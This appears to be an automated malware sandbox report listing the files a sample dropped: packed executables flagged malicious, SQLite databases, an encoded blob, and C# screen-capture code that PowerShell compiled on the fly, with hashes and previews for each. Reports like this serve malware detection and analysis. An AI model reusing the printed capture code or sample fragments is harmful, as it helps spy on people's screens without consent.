                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.C..@C..@C..@J.@O..@...AA..@...AO..@...AK..@...AG..@...A@..@C..@..@...AB..@...AB..@...@B..@...AB..@RichC..@................PE..d....(.b.........." .....@...0......P.....................................................`..............................................!..........................................................................`...8...........................................UPX0....................................UPX1.....@.......<..................@....rsrc....0...........@..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):293360
                                                                  Entropy (8bit):7.986777578304979
                                                                  Encrypted:false
                                                                  SSDEEP:6144:zxrLHdbWP4Ue5eV0KpvRWXH4mxy2Vc2X8r1kNgi7XG09JE1j4sbV9n:zNNWP4H543vRWomxdXgku8X9U1j4sbrn
                                                                  MD5:2218B2730B625B1AEEE6A67095C101A4
                                                                  SHA1:AA7F032B9C8B40E5ECF2A0F59FA5AE3F48EFF90A
                                                                  SHA-256:5E9ADD4DD806C2DE4D694B9BB038A6716BADB7D5F912884D80D593592BCDB8CA
                                                                  SHA-512:77AA10AE645C0BA24E31DCAB4726D8FB7AA3CB9708C7C85499E7D82CE46609D43E5DC74DA7CD32C170C7DDF50C8DB8945BAF3452421316C4A46888D745DE8DA0
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.OJ).OJ).OJ).7.).OJ).:K(.OJ).:O(.OJ).:N(.OJ).:I(.OJ)i:K(.OJ){=K(.OJ).OK).OJ)i:G(.OJ)i:J(.OJ)i:.).OJ)i:H(.OJ)Rich.OJ)........PE..d....(.b.........." .....P...........U... ................................................`..........................................{..X....y.......p.......................{.......................................a..8...........................................UPX0....................................UPX1.....P... ...D..................@....rsrc........p.......H..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                  Category:dropped
                                                                  Size (bytes):49152
                                                                  Entropy (8bit):0.8180424350137764
                                                                  Encrypted:false
                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):276
                                                                  Entropy (8bit):5.757561946968967
                                                                  Encrypted:false
                                                                  SSDEEP:6:dMYlJFlp/Xc7Si0rv2a0MV8UBD7dj9Uh2URL8v8MMd8DXOChV:mQ7/MjVMV8UBDpj9i18vE8DeChV
                                                                  MD5:0E95F784E5579A37D6A60228D9014518
                                                                  SHA1:0EF30761B0576BB492375D74B87A978EE598EA14
                                                                  SHA-256:73B981A0226A38B790A9FCBB3525B0BEA67E867A9E0F24D972B8C6C843107C27
                                                                  SHA-512:3180188CC0C5AFEBA5D22159AFF5D5A6916D162005D488B80372AB5F24127B66A5C53C2D1EAA6E514458E46EB9FE2231E10C7E29D0F6B058E92A9719EDFB10C4
                                                                  Malicious:false
                                                                  Preview:H4sIAAAAAAAEAIWQwW7CQAxEfyXi3PYDuIUgxIFD2oAqFfew3UyTrbLrlb0N0K/vglAVIaEe7fG8sb2fVXOiF1geISeidXyu6zfzY8cnHDF7uJEjHyDaYxgmci3cifHFyg1QolcXWj5oscQnQgshQnjcNUQfRtH+72tgv8WlnLaQXEMqFvxBrIrqBHJ1nWk5L9n+zg27DMpTXxzOWWWMS5MM0YatGYi28JHIa9khpMaMUM/BJc7LV71xoWLfQPIPru0L+P0X+HVKJD0BAAA=
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:MSVC .res
                                                                  Category:dropped
                                                                  Size (bytes):652
                                                                  Entropy (8bit):3.0719628156120726
                                                                  Encrypted:false
                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryfak7YnqqbPN5Dlq5J:+RI+ycuZhNdakSbPNnqX
                                                                  MD5:5E6327733D9CC8A84656D5805413E62E
                                                                  SHA1:49F34E944CDB869B5059DB2AE28B7D7FEBF1214C
                                                                  SHA-256:63CF0905521D53F6A246492CC7AF96BB4B1D7EF070991177CA1CA1489607C22D
                                                                  SHA-512:7DA717FF1F7FE95A1D0BF4C5048FEBD5B84446FED00B204A846C5BA35AE0C3B7C9D1CCDC154772C37CF9646F772FFBF2967805DCBAD4584F035F83E14CF4243F
                                                                  Malicious:false
                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.o.d.m.i.d.m.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.o.d.m.i.d.m.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1004
                                                                  Entropy (8bit):4.154581034278981
                                                                  Encrypted:false
                                                                  SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                  MD5:C76055A0388B713A1EABE16130684DC3
                                                                  SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                  SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                  SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                  Malicious:false
                                                                  Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):607
                                                                  Entropy (8bit):5.282372349821806
                                                                  Encrypted:false
                                                                  SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfHQzWZEifHQu:V3ka6KOkqeFkOfHQAEifHQu
                                                                  MD5:BEE325FBD523A38B5E6558E21F05E39C
                                                                  SHA1:0BD4CBAFF3DBA636A490B5D28557F07A9920F969
                                                                  SHA-256:04A60C9300BBC1B50B8A62CB1971100CBA4AD15D16ED1FCC7B316F7546F504F5
                                                                  SHA-512:5742DF4E15E8444DDAED8B29F16B6E7BC3DE04FE4999506A0865D5135555B5D4B9A2E1BF5126F84540914F0497D1460352CD16DD386337AF1537243BA95F4F32
                                                                  Malicious:false
                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.0.cs"
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):4096
                                                                  Entropy (8bit):3.1507795843033817
                                                                  Encrypted:false
                                                                  SSDEEP:48:6j7oEAtf0KhzBU/cGf6mtJQN084pW1ulda3Rq:pNz0c5mYO8+PK
                                                                  MD5:886FE39A5B5B111EF783446D81A00BC4
                                                                  SHA1:F50245FAD46E3D3974BBE364DBBEC65A55E5B8FC
                                                                  SHA-256:4BF6E125F01247C335B91681530152BD024DF6C807ABFA858350E9AEAC6AC5F6
                                                                  SHA-512:97351F8A660F89D0CB43F4D041400E51D9AEAEABCD2DBEAB6372BE770BF251CCDD915EC3F4EF33841DDC03D0561012DE8DCC6A963BE4E456CB8126F96C164150
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                  Category:modified
                                                                  Size (bytes):1148
                                                                  Entropy (8bit):5.4737146933831
                                                                  Encrypted:false
